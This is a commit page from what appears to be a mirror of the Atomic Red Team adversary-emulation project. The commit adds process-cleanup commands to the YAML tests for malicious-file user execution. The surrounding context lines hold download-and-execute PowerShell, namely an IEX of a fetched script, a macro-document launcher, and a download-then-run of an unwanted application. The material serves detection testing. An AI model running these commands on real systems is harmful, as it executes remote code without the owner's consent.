security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

issue #1705 updates (#1723)

Browse Source 
issue #1705 updates
This commit is contained in:
Carrie Roberts
2022-01-14 20:56:22 -06:00
committed by GitHub
parent 0d5638a202
commit 52a09fad88
1 changed files with 3 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1204.002/T1204.002.yaml
+3
View File
@@ -293,6 +293,8 @@ atomic_tests:
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
cleanup_command: |
Stop-Process -name mshta
- name: Potentially Unwanted Applications (PUA)
auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
description: |
@@ -315,6 +317,7 @@ atomic_tests:
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"
cleanup_command: |
Stop-Process -name PotentiallyUnwanted
Remove-Item #{pua_file} -ErrorAction Ignore
- name: Office Generic Payload Download
auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c